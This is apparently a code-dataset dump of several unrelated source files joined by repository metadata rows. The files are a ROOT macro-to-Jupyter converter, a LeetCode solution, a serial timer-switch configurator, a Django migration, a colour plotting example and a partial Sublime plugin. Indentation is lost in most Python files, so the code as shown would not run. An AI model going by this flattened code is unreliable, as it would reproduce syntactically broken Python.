if line.startswith("///"):
if not line.startswith("/// \\") and isNotebook:
description += ('# ' + line[4:] + '\n')
else:
break
newtext = ''
for line in lines[i:]:
newtext += (line + "\n")
description = description.replace("\\f$", "$")
description = description.replace("\\f[", "$$")
description = description.replace("\\f]", "$$")
return newtext, description, author, isNotebook, isJsroot, nodraw, needsHeaderFile
def cppFunction(text):
"""
Extracts main function for the function enclosure by means of regular expression
>>> cppFunction('''void mainfunction(arguments = values){
... content of function
... which spans
... several lines
... }''')
'\\n content of function\\n which spans\\n several lines\\n'
>>> cppFunction('''void mainfunction(arguments = values)
... {
... content of function
... which spans
... several lines
... }''')
'\\n content of function\\n which spans\\n several lines\\n'
>>> cppFunction('''void mainfunction(arguments = values
... morearguments = morevalues)
... {
... content of function
... which spans
... several lines
... }''')
'\\n content of function\\n which spans\\n several lines\\n'
"""
functionContentRe = re.compile(r'(?<=\{).*(?=^\})', flags = re.DOTALL | re.MULTILINE)
match = functionContentRe.search(text)
if match:
return match.group()
else:
return text
def cppComments(text):
"""
Converts comments delimited by // and on a new line into a markdown cell. For C++ files only.
>>> cppComments('''// This is a
... // multiline comment
... void function(){}''')
'# <markdowncell>\\n# This is a\\n# multiline comment\\n# <codecell>\\nvoid function(){}\\n'
>>> cppComments('''void function(){
... int variable = 5 // Comment not in cell
... // Comment also not in cell
... }''')
'void function(){\\n int variable = 5 // Comment not in cell\\n // Comment also not in cell\\n}\\n'
"""
text = text.splitlines()
newtext = ''
inComment = False
for line in text:
if line.startswith("//") and not inComment: # True if first line of comment
inComment = True
newtext += "# <markdowncell>\n"
if line[2:].lstrip().startswith("#"): # Don't use .capitalize() if line starts with hash, ie it is a header
newtext += ("# " + line[2:]+"\n")
else:
newtext += ("# " + line[2:].lstrip().capitalize()+"\n")
elif inComment and not line.startswith("//"): # True if first line after comment
inComment = False
newtext += "# <codecell>\n"
newtext += (line+"\n")
elif inComment and line.startswith("//"): # True if in the middle of a comment block
newtext += ("# " + line[2:] + "\n")
else:
newtext += (line+"\n")
return newtext
def split(text):
"""
Splits the text string into main, helpers, and rest. main is the main function,
i.e. the function tha thas the same name as the macro file. Helpers is a list of
strings, each a helper function, i.e. any other function that is not the main function.
Finally, rest is a string containing any top-level code outside of any function.
Comments immediately prior to a helper cell are converted into markdown cell,
added to the helper, and removed from rest.
Intended for C++ files only.
>>> split('''void tutorial(){
... content of tutorial
... }''')
('void tutorial(){\\n content of tutorial\\n}', [], '')
>>> split('''void tutorial(){
... content of tutorial
... }
... void helper(arguments = values){
... helper function
... content spans lines
... }''')
('void tutorial(){\\n content of tutorial\\n}', ['\\n# <markdowncell>\\n A helper function is created: \\n# <codecell>\\n%%cpp -d\\nvoid helper(arguments = values){\\n helper function\\n content spans lines\\n}'], '')
>>> split('''#include <header.h>
... using namespace NAMESPACE
... void tutorial(){
... content of tutorial
... }
... void helper(arguments = values){
... helper function
... content spans lines
... }''')
('void tutorial(){\\n content of tutorial\\n}', ['\\n# <markdowncell>\\n A helper function is created: \\n# <codecell>\\n%%cpp -d\\nvoid helper(arguments = values){\\n helper function\\n content spans lines\\n}'], '#include <header.h>\\nusing namespace NAMESPACE')
>>> split('''void tutorial(){
... content of tutorial
... }
... // This is a multiline
... // description of the
... // helper function
... void helper(arguments = values){
... helper function
... content spans lines
... }''')
('void tutorial(){\\n content of tutorial\\n}', ['\\n# <markdowncell>\\n This is a multiline\\n description of the\\n helper function\\n \\n# <codecell>\\n%%cpp -d\\nvoid helper(arguments = values){\\n helper function\\n content spans lines\\n}'], '')
"""
functionReString="("
for cpptype in gTypesList:
functionReString += ("^%s|") % cpptype
functionReString = functionReString[:-1] + r")\s?\*?&?\s?[\w:]*?\s?\([^\)]*\)\s*\{.*?^\}"
functionRe = re.compile(functionReString, flags = re.DOTALL | re.MULTILINE)
#functionre = re.compile(r'(^void|^int|^Int_t|^TF1|^string|^bool|^double|^float|^char|^TCanvas|^TTree|^TString|^TSeqCollection|^Double_t|^TFile|^Long64_t|^Bool_t)\s?\*?\s?[\w:]*?\s?\([^\)]*\)\s*\{.*?^\}', flags = re.DOTALL | re.MULTILINE)
functionMatches = functionRe.finditer(text)
helpers = []
main = ""
for matchString in [match.group() for match in functionMatches]:
if tutName == findFunctionName(matchString): # if the name of the function is that of the macro
main = matchString
else:
helpers.append(matchString)
# Create rest by replacing the main and helper functions with blank strings
rest = text.replace(main, "")
for helper in helpers:
rest = rest.replace(helper, "")
newHelpers = []
lines = text.splitlines()
for helper in helpers: # For each helper function
for i, line in enumerate(lines): # Look through the lines until the
if line.startswith(helper[:helper.find("\n")]): # first line of the helper is found
j = 1
commentList = []
while lines[i-j].startswith("//"): # Add comment lines immediately prior to list
commentList.append(lines[i-j])
j += 1
if commentList: # Convert list to string
commentList.reverse()
helperDescription = ''
for comment in commentList:
if comment in ("//", "// "):
helperDescription += "\n\n" # Two newlines to create hard break in Markdown
else:
helperDescription += (comment[2:] + "\n")
rest = rest.replace(comment, "")
break
else: # If no comments are found create generic description
helperDescription = "A helper function is created:"
break
if findFunctionName(helper) != "main": # remove void main function
newHelpers.append("\n# <markdowncell>\n " + helperDescription + " \n# <codecell>\n%%cpp -d\n" + helper)
rest = rest.rstrip("\n /") # remove newlines and empty comments at the end of string
return main, newHelpers, rest
def findFunctionName(text):
"""
Takes a string representation of a C++ function as an input,
finds and returns the name of the function
>>> findFunctionName('void functionName(arguments = values){}')
'functionName'
>>> findFunctionName('void functionName (arguments = values){}')
'functionName'
>>> findFunctionName('void *functionName(arguments = values){}')
'functionName'
>>> findFunctionName('void* functionName(arguments = values){}')
'functionName'
>>> findFunctionName('void * functionName(arguments = values){}')
'functionName'
>>> findFunctionName('void class::functionName(arguments = values){}')
'class::functionName'
"""
functionNameReString="(?<="
for cpptype in gTypesList:
functionNameReString += ("(?<=%s)|") % cpptype
functionNameReString = functionNameReString[:-1] + r")\s?\*?\s?[^\s]*?(?=\s?\()"
functionNameRe = re.compile(functionNameReString, flags = re.DOTALL | re.MULTILINE)
#functionnamere = re.compile(r'(?<=(?<=int)|(?<=void)|(?<=TF1)|(?<=Int_t)|(?<=string)|(?<=double)|(?<=Double_t)|(?<=float)|(?<=char)|(?<=TString)|(?<=bool)|(?<=TSeqCollection)|(?<=TCanvas)|(?<=TTree)|(?<=TFile)|(?<=Long64_t)|(?<=Bool_t))\s?\*?\s?[^\s]*?(?=\s?\()', flags = re.DOTALL | re.MULTILINE)
match = functionNameRe.search(text)
functionname = match.group().strip(" *\n")
return functionname
def processmain(text):
"""
    Evaluates whether the main function returns a TCanvas or requires input. If it
    does, then the keepfunction flag is True, meaning the function won't be extracted
    by cppFunction. If the main function takes arguments, an extra cell that defines
    them is returned, to be added before the main function later.
>>> processmain('''void function(){
... content of function
... spanning several
... lines
... }''')
('void function(){\\n content of function\\n spanning several\\n lines\\n}', '')
>>> processmain('''void function(arguments = values){
... content of function
... spanning several
... lines
... }''')
('void function(arguments = values){\\n content of function\\n spanning several\\n lines\\n}', '# <markdowncell> \\n Arguments are defined. \\n# <codecell>\\narguments = values;\\n# <codecell>\\n')
>>> processmain('''void function(argument1 = value1, //comment 1
... argument2 = value2 /*comment 2*/ ,
... argument3 = value3,
... argument4 = value4)
... {
... content of function
... spanning several
... lines
... }''')
('void function(argument1 = value1, //comment 1\\n argument2 = value2 /*comment 2*/ ,\\n argument3 = value3, \\n argument4 = value4)\\n{\\n content of function\\n spanning several\\n lines\\n}', '# <markdowncell> \\n Arguments are defined. \\n# <codecell>\\nargument1 = value1;\\nargument2 = value2;\\nargument3 = value3;\\nargument4 = value4;\\n# <codecell>\\n')
>>> processmain('''TCanvas function(){
... content of function
... spanning several
... lines
... return c1
... }''')
('TCanvas function(){\\n content of function\\n spanning several \\n lines\\n return c1\\n}', '')
"""
argumentsCell = ''
if text:
argumentsre = re.compile(r'(?<=\().*?(?=\))', flags = re.DOTALL | re.MULTILINE)
arguments = argumentsre.search(text)
if len(arguments.group()) > 3:
argumentsCell = "# <markdowncell> \n Arguments are defined. \n# <codecell>\n"
individualArgumentre = re.compile(r'[^/\n,]*?=[^/\n,]*') #, flags = re.DOTALL) #| re.MULTILINE)
argumentList=individualArgumentre.findall(arguments.group())
for argument in argumentList:
argumentsCell += argument.strip("\n ") + ";\n"
argumentsCell += "# <codecell>\n"
return text, argumentsCell
# now define text transformers
def removePaletteEditor(code):
code = code.replace("img->StartPaletteEditor();", "")
code = code.replace("Open the color editor", "")
return code
def runEventExe(code):
if "copytree" in tutName:
return "# <codecell> \n.! $ROOTSYS/test/eventexe 1000 1 1 1 \n" + code
return code
def getLibMathMore(code):
if "quasirandom" == tutName:
return "# <codecell> \ngSystem->Load(\"libMathMore\"); \n# <codecell> \n" + code
return code
def roofitRemoveSpacesComments(code):
def changeString(matchObject):
matchString = matchObject.group()
matchString = matchString[0] + " " + matchString[1:]
matchString = matchString.replace(" " , "THISISASPACE")
matchString = matchString.replace(" " , "")
matchString = matchString.replace("THISISASPACE" , " ")
return matchString
    newcode = re.sub(r"#\s\s?\w\s[\w-]\s\w.*", changeString, code)
return newcode
def declareNamespace(code):
if "using namespace RooFit;\nusing namespace RooStats;" in code:
code = code.replace("using namespace RooFit;\nusing namespace RooStats;", "# <codecell>\n%%cpp -d\n// This is a workaround to make sure the namespace is used inside functions\nusing namespace RooFit;\nusing namespace RooStats;\n# <codecell>\n")
else:
code = code.replace("using namespace RooFit;", "# <codecell>\n%%cpp -d\n// This is a workaround to make sure the namespace is used inside functions\nusing namespace RooFit;\n# <codecell>\n")
code = code.replace("using namespace RooStats;", "# <codecell>\n%%cpp -d\n// This is a workaround to make sure the namespace is used inside functions\nusing namespace RooStats;\n# <codecell>\n")
code = code.replace("using namespace ROOT::Math;", "# <codecell>\n%%cpp -d\n// This is a workaround to make sure the namespace is used inside functions\nusing namespace ROOT::Math;\n# <codecell>\n")
return code
def rs401dGetFiles(code):
if tutName == "rs401d_FeldmanCousins":
code = code.replace(
"""#if !defined(__CINT__) || defined(__MAKECINT__)\n#include "../tutorials/roostats/NuMuToNuE_Oscillation.h"\n#include "../tutorials/roostats/NuMuToNuE_Oscillation.cxx" // so that it can be executed directly\n#else\n#include "../tutorials/roostats/NuMuToNuE_Oscillation.cxx+" // so that it can be executed directly\n#endif""" , """std::string tutDir = gROOT->GetTutorialsDir();\nTString headerDir = TString::Format("#include \\\"%s/roostats/NuMuToNuE_Oscillation.h\\\"", tutDir.c_str());\nTString impDir = TString::Format("#include \\\"%s/roostats/NuMuToNuE_Oscillation.cxx\\\"", tutDir.c_str());\ngROOT->ProcessLine(headerDir);\ngROOT->ProcessLine(impDir);""")
return code
def declareIncludes(code):
if tutName != "fitcont":
code = re.sub(r"# <codecell>\s*#include", "# <codecell>\n%%cpp -d\n#include" , code)
return code
def tree4GetFiles(code):
if tutName == "tree4":
code = code.replace(
"""#include \"../test/Event.h\"""" , """# <codecell>\nTString dir = "$ROOTSYS/test/Event.h";\ngSystem->ExpandPathName(dir);\nTString includeCommand = TString::Format("#include \\\"%s\\\"" , dir.Data());\ngROOT->ProcessLine(includeCommand);""")
return code
def disableDrawProgressBar(code):
code = code.replace(":DrawProgressBar",":!DrawProgressBar")
return code
def fixes(code):
codeTransformers=[removePaletteEditor, runEventExe, getLibMathMore,
roofitRemoveSpacesComments, declareNamespace, rs401dGetFiles ,
declareIncludes, tree4GetFiles, disableDrawProgressBar]
for transformer in codeTransformers:
code = transformer(code)
return code
def changeMarkdown(code):
code = code.replace("~~~" , "```")
code = code.replace("{.cpp}", "cpp")
code = code.replace("{.bash}", "bash")
return code
def isCpp():
"""
Return True if extension is a C++ file
"""
return extension in ("C", "c", "cpp", "C++", "cxx")
def findTimeout():
listLongTutorials = ["OneSidedFrequentistUpperLimitWithBands", "StandardBayesianNumericalDemo",
"TwoSidedFrequentistUpperLimitWithBands" , "HybridStandardForm", "rs401d_FeldmanCousins",
"TMVAMultipleBackgroundExample", "TMVARegression", "TMVAClassification", "StandardHypoTestDemo"]
if tutName in listLongTutorials:
return 300
else:
return 90
# -------------------------------------
# ------------ Main Program------------
# -------------------------------------
def mainfunction(text):
"""
Main function. Calls all other functions, depending on whether the macro input is in python or c++.
It adds the header information. Also, it adds a cell that draws all canvases. The working text is
then converted to a version 3 jupyter notebook, subsequently updated to a version 4. Then, metadata
    associated with the language the macro is written in is attached to the notebook. Finally the
notebook is executed and output as a Jupyter notebook.
"""
# Modify text from macros to suit a notebook
if isCpp():
main, helpers, rest = split(text)
main, argumentsCell = processmain(main)
main = cppComments(unindenter(cppFunction(main))) # Remove function, Unindent, and convert comments to Markdown cells
if argumentsCell:
main = argumentsCell + main
rest = cppComments(rest) # Convert top level code comments to Markdown cells
# Construct text by starting with top level code, then the helper functions, and finally the main function.
# Also add cells for headerfile, or keepfunction
if needsHeaderFile:
text = "# <markdowncell>\n# The header file must be copied to the current directory\n# <codecell>\n.!cp %s%s.h .\n# <codecell>\n" % (tutRelativePath, tutName)
text += rest
else:
text = "# <codecell>\n" + rest
for helper in helpers:
text += helper
text += ("\n# <codecell>\n" + main)
if extension == "py":
text = pythonMainFunction(text)
text = pythonComments(text) # Convert comments into Markdown cells
# Perform last minute fixes to the notebook, used for specific fixes needed by some tutorials
text = fixes(text)
# Change to standard Markdown
newDescription = changeMarkdown(description)
# Add the title and header of the notebook
text = "# <markdowncell> \n# # %s\n%s# \n# \n# **Author:** %s \n# <i><small>This notebook tutorial was automatically generated " \
"with <a href= \"https://github.com/root-mirror/root/blob/master/documentation/doxygen/converttonotebook.py\">ROOTBOOK-izer (Beta)</a> " \
"from the macro found in the ROOT repository on %s.</small></i>\n# <codecell>\n%s" % (tutTitle, newDescription, author, date, text)
    # Add a cell at the end of the notebook that draws all the canvases, preceded by a Markdown cell explaining it.
if isJsroot and not nodraw:
if isCpp():
text += "\n# <markdowncell> \n# Draw all canvases \n# <codecell>\n%jsroot on\ngROOT->GetListOfCanvases()->Draw()"
if extension == "py":
text += "\n# <markdowncell> \n# Draw all canvases \n# <codecell>\n%jsroot on\nfrom ROOT import gROOT \ngROOT.GetListOfCanvases().Draw()"
elif not nodraw:
if isCpp():
text += "\n# <markdowncell> \n# Draw all canvases \n# <codecell>\ngROOT->GetListOfCanvases()->Draw()"
if extension == "py":
text += "\n# <markdowncell> \n# Draw all canvases \n# <codecell>\nfrom ROOT import gROOT \ngROOT.GetListOfCanvases().Draw()"
# Create a notebook from the working text
nbook = v3.reads_py(text)
nbook = v4.upgrade(nbook) # Upgrade v3 to v4
# Load notebook string into json format, essentially creating a dictionary
json_data = json.loads(v4.writes(nbook))
# add the corresponding metadata
if extension == "py":
json_data[u'metadata'] = {
"kernelspec": {
"display_name": "Python 2",
"language": "python",
"name": "python2"
},
"language_info": {
"codemirror_mode": {
"name": "ipython",
"version": 2
},
"file_extension": ".py",
"mimetype": "text/x-python",
"name": "python",
"nbconvert_exporter": "python",
"pygments_lexer": "ipython2",
"version": "2.7.10"
}
}
elif isCpp():
json_data[u'metadata'] = {
"kernelspec": {
"display_name": "ROOT C++",
"language": "c++",
"name": "root"
},
"language_info": {
"codemirror_mode": "text/x-c++src",
"file_extension": ".C",
"mimetype": " text/x-c++src",
"name": "c++"
}
}
# write the json file with the metadata
with open(outPathName, 'w') as fout:
json.dump(json_data, fout, indent=1, sort_keys=True)
print(time.time() - starttime)
timeout = findTimeout()
    # Call the command that executes the notebook and creates a new notebook with the output
r = subprocess.call(["jupyter", "nbconvert", "--ExecutePreprocessor.timeout=%d" % timeout, "--to=notebook", "--execute", outPathName])
if r != 0:
        sys.stderr.write("NOTEBOOK_CONVERSION_WARNING: Nbconvert failed for notebook %s with return code %s\n" % (outname, r))
if isJsroot:
subprocess.call(["jupyter", "trust", os.path.join(outdir, outnameconverted)])
    if r == 0:  # Only remove the notebook without output if nbconvert succeeds
os.remove(outPathName)
if __name__ == "__main__":
if str(sys.argv[1]) == "-test":
tutName = "tutorial"
doctest.testmod(verbose=True)
else:
# -------------------------------------
# ----- Preliminary definitions--------
# -------------------------------------
# Extract and define the name of the file as well as its derived names
tutPathName = str(sys.argv[1])
tutPath = os.path.dirname(tutPathName)
if tutPath.split("/")[-2] == "tutorials":
tutRelativePath = "$ROOTSYS/tutorials/%s/" % tutPath.split("/")[-1]
tutFileName = os.path.basename(tutPathName)
tutName, extension = tutFileName.split(".")
tutTitle = re.sub( r"([A-Z\d])", r" \1", tutName).title()
outname = tutFileName + ".ipynb"
outnameconverted = tutFileName + ".nbconvert.ipynb"
# Extract output directory
try:
outdir = str(sys.argv[2])
except:
outdir = tutPath
outPathName = os.path.join(outdir, outname)
# Find and define the time and date this script is run
date = datetime.now().strftime("%A, %B %d, %Y at %I:%M %p")
# -------------------------------------
# -------------------------------------
# -------------------------------------
        # Set DYLD_LIBRARY_PATH. When run without root access or as a different user, especially on Mac systems,
        # it is possible for security reasons that the environment does not include this definition, so it is manually defined.
os.environ["DYLD_LIBRARY_PATH"] = os.environ["ROOTSYS"] + "/lib"
# Open the file to be converted
with open(tutPathName) as fin:
text = fin.read()
# Extract information from header and remove header from text
if extension == "py":
text, description, author, isNotebook, isJsroot, nodraw, needsHeaderFile = readHeaderPython(text)
elif isCpp():
text, description, author, isNotebook, isJsroot, nodraw, needsHeaderFile = readHeaderCpp(text)
if isNotebook:
starttime = time.time()
mainfunction(text)
print(time.time() - starttime)
else:
pass
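# Example invocations (hedged; the script name comes from the repository link in
# the generated header above, and the tutorial path is illustrative):
#   python converttonotebook.py $ROOTSYS/tutorials/hist/hist000.C /tmp/notebooks
#   python converttonotebook.py -test   # runs the doctests defined above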
|
lgpl-2.1
| 7,401,523,947,888,513,000
| 41.389222
| 670
| 0.592965
| false
| 3.84102
| false
| false
| false
|
zqfan/leetcode
|
algorithms/306. Additive Number/solution.py
|
1
|
1232
|
class Solution(object):
def isAdditiveNumber(self, num):
"""
:type num: str
:rtype: bool
"""
        def str_add(s1, s2):
            # Add two non-negative integers given as decimal strings,
            # working digit by digit from the right with a carry.
            res = []
            carry = 0; i1 = len(s1)-1; i2 = len(s2)-1
            while i1 >= 0 or i2 >= 0:
                if i1 >= 0:
                    carry += ord(s1[i1]) - ord('0')
                if i2 >= 0:
                    carry += ord(s2[i2]) - ord('0')
                res.append(str(carry % 10))
                carry /= 10; i1 -= 1; i2 -= 1
            if carry:
                res.append('1')
            return ''.join(reversed(res))
        l = len(num)
        # The first number takes at most half of the digits.
        for i in xrange(l/2):
            if i > 0 and num[0] == '0':  # no leading zero allowed
                break
            s1 = num[:i+1]
            # The second number must leave room for at least one sum,
            # so it ends before two thirds of the string.
            for j in xrange(i+1, 2*l/3):
                if j - i > 1 and num[i+1] == '0':  # no leading zero allowed
                    break
                s2 = num[i+1:j+1]
                s = str_add(s1, s2)
                k = j + 1
                # Greedily match successive sums against the rest of num.
                while k < l:
                    if s != num[k:k+len(s)]:
                        break
                    k += len(s)
                    s, s2 = str_add(s2, s), s
                if k == l:
                    return True
return False
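# Hedged sanity checks (not part of the original solution); the expected
# results follow the LeetCode 306 problem statement:
if __name__ == '__main__':
    sol = Solution()
    print sol.isAdditiveNumber("112358")     # True:  1, 1, 2, 3, 5, 8
    print sol.isAdditiveNumber("199100199")  # True:  1, 99, 100, 199
    print sol.isAdditiveNumber("1203")       # False: no valid additive split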
|
gpl-3.0
| 5,049,437,436,025,781,000
| 30.589744
| 53
| 0.323052
| false
| 3.571014
| false
| false
| false
|
apeng2012/TimeSwitch4ModemRouter
|
SetTimer/switchTime.py
|
1
|
5093
|
import sys
import time
import serial
try:
import xml.etree.cElementTree as ET
except ImportError:
import xml.etree.ElementTree as ET
saveFileName = "SwitchTime.xml"
def list2xml(stList):
if len(stList) != 7:
print "DayOfWeek num error!"
return
weekname = "sunday", "monday", "tuesday", "wednesday", "thursday", "friday", "saturday"
root = ET.Element("switchTime")
i = 0
for itList in stList:
dayofweek = ET.SubElement(root, weekname[i])
print weekname[i]
i = i+1
for it in itList:
item = ET.SubElement(dayofweek, "item")
item.text = it
print "\t"+it
# wrap it in an ElementTree instance, and save as XML
tree = ET.ElementTree(root)
tree.write(saveFileName)
def xml2list(stList):
tree = ET.ElementTree(file=saveFileName)
root = tree.getroot();
i=0
for day in root:
print day.tag
for elem in day:
print elem.text
stList[i].append(elem.text)
i = i+1
#!/usr/bin/env python
#encoding: utf-8
import ctypes
STD_INPUT_HANDLE = -10
STD_OUTPUT_HANDLE= -11
STD_ERROR_HANDLE = -12
FOREGROUND_BLACK = 0x0
FOREGROUND_BLUE = 0x01 # text color contains blue.
FOREGROUND_GREEN= 0x02 # text color contains green.
FOREGROUND_RED = 0x04 # text color contains red.
FOREGROUND_INTENSITY = 0x08 # text color is intensified.
BACKGROUND_BLUE = 0x10 # background color contains blue.
BACKGROUND_GREEN= 0x20 # background color contains green.
BACKGROUND_RED = 0x40 # background color contains red.
BACKGROUND_INTENSITY = 0x80 # background color is intensified.
class Color:
''' See http://msdn.microsoft.com/library/default.asp?url=/library/en-us/winprog/winprog/windows_api_reference.asp
for information on Windows APIs.'''
std_out_handle = ctypes.windll.kernel32.GetStdHandle(STD_OUTPUT_HANDLE)
def set_cmd_color(self, color, handle=std_out_handle):
"""(color) -> bit
Example: set_cmd_color(FOREGROUND_RED | FOREGROUND_GREEN | FOREGROUND_BLUE | FOREGROUND_INTENSITY)
"""
        ok = ctypes.windll.kernel32.SetConsoleTextAttribute(handle, color)
        return ok
def reset_color(self):
self.set_cmd_color(FOREGROUND_RED | FOREGROUND_GREEN | FOREGROUND_BLUE)
def print_red_text(self, print_text):
self.set_cmd_color(FOREGROUND_RED | FOREGROUND_INTENSITY)
print print_text
self.reset_color()
def print_green_text(self, print_text):
self.set_cmd_color(FOREGROUND_GREEN | FOREGROUND_INTENSITY)
print print_text
self.reset_color()
def print_blue_text(self, print_text):
self.set_cmd_color(FOREGROUND_BLUE | FOREGROUND_INTENSITY)
print print_text
self.reset_color()
def print_red_text_with_blue_bg(self, print_text):
self.set_cmd_color(FOREGROUND_RED | FOREGROUND_INTENSITY| BACKGROUND_BLUE | BACKGROUND_INTENSITY)
print print_text
self.reset_color()
def main():
ser = serial.Serial(sys.argv[1], 9600, timeout=1)
#ser = serial.Serial('COM10', 9600, timeout=1)
if ser.isOpen() != True:
print "open serial port error!"
return
clr = Color()
#Hi
cmd = "Hi"
ser.write(cmd); print cmd
    res = ser.readline().strip(); clr.print_green_text(res)
if res.find("Hello") == -1:
print "please reset board or check serial port."
return
#SetDateTime 2014-01-27 13:21:25 1
dt = time.localtime()
cmd = time.strftime("SetDateTime %Y-%m-%d %H:%M:%S %w\r\n", dt)
ser.write(cmd); print cmd
    res = ser.readline().strip(); clr.print_green_text(res)
#GetDateTime
cmd = "GetDateTime"
ser.write(cmd); print cmd
    res = ser.readline().strip(); clr.print_green_text(res)
reList = [[] for i in range(7)]
#ReadAlarm
cmd = "ReadAlarm"
ser.write(cmd); print cmd
    res = ser.readline().strip(); clr.print_green_text(res) # expects a reply like "ReadAlarm x"
for i in range(7):
while True:
            res = ser.readline().strip(); clr.print_green_text(res)
if res.find("no alarm") != -1:
continue
if res.find("weekday") != -1:
break
reList[i].append(res[0:12])
list2xml(reList)
print "Please set switch time in " + saveFileName
raw_input("Press Enter to continue...")
reList = [[] for i in range(7)]
xml2list(reList)
# WriteAlarmX 1>hh:mm-hh:mm 2>...
for i in range(7):
cmd = "WriteAlarm" + str(i) + " "
j = 1
for t in reList[i]:
t.strip()
cmd = cmd + str(j) + ">" + t + " "
j = j + 1
ser.write(cmd); print cmd
        res = ser.readline().strip(); clr.print_green_text(res)
# ProgramAlarm
cmd = "ProgramAlarm"
ser.write(cmd); print cmd
    res = ser.readline().strip(); clr.print_green_text(res)
print "Config Over. reset board to start"
ser.close()
if __name__=='__main__':
main()
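# Example session (hedged; the serial port name is platform specific):
#   python switchTime.py COM10
# The board's current alarms are dumped to SwitchTime.xml; edit that file,
# press Enter at the prompt, and the schedule is written back and programmed.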
|
gpl-2.0
| -8,980,545,949,764,376,000
| 28.275862
| 118
| 0.611427
| false
| 3.320078
| false
| false
| false
|
tiagovaz/saskatoon
|
saskatoon/harvest/migrations/0002_auto_20180507_1941.py
|
1
|
4140
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2018-05-07 23:41
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('harvest', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='historicalproperty',
name='approximative_maturity_date',
field=models.DateField(blank=True, null=True, verbose_name='Approximative maturity date'),
),
migrations.AddField(
model_name='historicalproperty',
name='fruits_height',
field=models.PositiveIntegerField(blank=True, null=True, verbose_name='Height of lowest fruits'),
),
migrations.AddField(
model_name='historicalproperty',
name='harvest_every_year',
field=models.BooleanField(default=False, verbose_name='Produces fruits every year'),
),
migrations.AddField(
model_name='historicalproperty',
name='ladder_available',
field=models.BooleanField(default=False, verbose_name='There is a ladder available in the property'),
),
migrations.AddField(
model_name='historicalproperty',
name='ladder_available_for_outside_picks',
field=models.BooleanField(default=False, verbose_name='A ladder is available in the property and can be used for nearby picks'),
),
migrations.AddField(
model_name='historicalproperty',
name='number_of_trees',
field=models.PositiveIntegerField(blank=True, null=True, verbose_name='Total number of trees in this property'),
),
migrations.AddField(
model_name='historicalproperty',
name='trees_accessibility',
field=models.CharField(blank=True, max_length=200, null=True, verbose_name='Trees accessibility'),
),
migrations.AddField(
model_name='historicalproperty',
name='validated',
            field=models.BooleanField(default=b'True', help_text='This property data has been reviewed and validated by a collective member', verbose_name='Validated'),
),
migrations.AddField(
model_name='property',
name='approximative_maturity_date',
field=models.DateField(blank=True, null=True, verbose_name='Approximative maturity date'),
),
migrations.AddField(
model_name='property',
name='fruits_height',
field=models.PositiveIntegerField(blank=True, null=True, verbose_name='Height of lowest fruits'),
),
migrations.AddField(
model_name='property',
name='harvest_every_year',
field=models.BooleanField(default=False, verbose_name='Produces fruits every year'),
),
migrations.AddField(
model_name='property',
name='ladder_available',
field=models.BooleanField(default=False, verbose_name='There is a ladder available in the property'),
),
migrations.AddField(
model_name='property',
name='ladder_available_for_outside_picks',
field=models.BooleanField(default=False, verbose_name='A ladder is available in the property and can be used for nearby picks'),
),
migrations.AddField(
model_name='property',
name='number_of_trees',
field=models.PositiveIntegerField(blank=True, null=True, verbose_name='Total number of trees in this property'),
),
migrations.AddField(
model_name='property',
name='trees_accessibility',
field=models.CharField(blank=True, max_length=200, null=True, verbose_name='Trees accessibility'),
),
migrations.AddField(
model_name='property',
name='validated',
            field=models.BooleanField(default=b'True', help_text='This property data has been reviewed and validated by a collective member', verbose_name='Validated'),
),
]
|
agpl-3.0
| -6,729,985,459,804,566,000
| 42.578947
| 167
| 0.618599
| false
| 4.466019
| false
| false
| false
|
colour-science/colour
|
colour/examples/plotting/examples_volume_plots.py
|
1
|
1465
|
# -*- coding: utf-8 -*-
"""
Showcases colour models volume and gamut plotting examples.
"""
import numpy as np
from colour.plotting import (plot_RGB_colourspaces_gamuts, plot_RGB_scatter,
colour_style)
from colour.utilities import message_box
message_box('Colour Models Volume and Gamut Plots')
colour_style()
message_box(('Plotting "ITU-R BT.709" RGB colourspace volume in "CIE xyY" '
'colourspace.'))
plot_RGB_colourspaces_gamuts(
('ITU-R BT.709', ), reference_colourspace='CIE xyY')
print('\n')
message_box(('Comparing "ITU-R BT.709" and "ACEScg" RGB colourspaces volume '
'in "CIE L*a*b*" colourspace.'))
plot_RGB_colourspaces_gamuts(
('ITU-R BT.709', 'ACEScg'),
reference_colourspace='CIE Lab',
face_colours=(None, (0.25, 0.25, 0.25)),
edge_colours=(None, (0.25, 0.25, 0.25)),
edge_alpha=(1.0, 0.1),
face_alpha=(1.0, 0.0))
print('\n')
message_box(('Plotting "ACEScg" colourspaces values in "CIE L*a*b*" '
'colourspace.'))
RGB = np.random.random((32, 32, 3))
plot_RGB_scatter(
RGB,
'ACEScg',
reference_colourspace='CIE Lab',
colourspaces=('ACEScg', 'ITU-R BT.709'),
face_colours=((0.25, 0.25, 0.25), None),
edge_colours=((0.25, 0.25, 0.25), None),
edge_alpha=(0.1, 0.5),
face_alpha=(0.1, 0.5),
grid_face_colours=(0.1, 0.1, 0.1),
grid_edge_colours=(0.1, 0.1, 0.1),
grid_edge_alpha=0.5,
grid_face_alpha=0.1)
|
bsd-3-clause
| 7,481,060,059,926,544,000
| 27.173077
| 77
| 0.612287
| false
| 2.723048
| false
| true
| false
|
nsubiron/SublimeSuricate
|
suricate/command_parser.py
|
1
|
3785
|
# Sublime Suricate, Copyright (C) 2013 N. Subiron
#
# This program comes with ABSOLUTELY NO WARRANTY. This is free software, and you
# are welcome to redistribute it and/or modify it under the terms of the GNU
# General Public License as published by the Free Software Foundation, either
# version 3 of the License, or (at your option) any later version.
import collections
import sublime
from . import _suricate as suricate
from . import flags
_DEFAULT_DEFAULTS = \
{
'caption': 'No description provided',
'mnemonic': None,
'group': None,
'args': {},
'flags': None,
'keys': [],
'selector': None,
'context': None,
'context_menu': False
}
_TAG_LIST = ['call'] + list(_DEFAULT_DEFAULTS.keys())
_PLATFORM = sublime.platform()
Command = collections.namedtuple('Command', _TAG_LIST)
class _CommandParser(object):
def __init__(self, settings):
self.ignore_default_keybindings = settings.get('ignore_default_keybindings', False)
self.override_ctrl_o = settings.get('override_default_opening_key', False)
key_map = settings.get('key_map', {})
self.os_key_map = dict(key_map.get('*', {}))
self.os_key_map.update(dict(key_map.get(_PLATFORM, {})))
self.commands = {}
def parse(self, profile):
data = self._get_commands(profile, 'commands')
if self.ignore_default_keybindings:
self._remove_key_bindings(data)
user_data = self._get_commands(profile, 'user_commands')
self._rupdate(data, user_data)
defaults = self._merge_platform_specific_tags(profile.get('defaults', _DEFAULT_DEFAULTS))
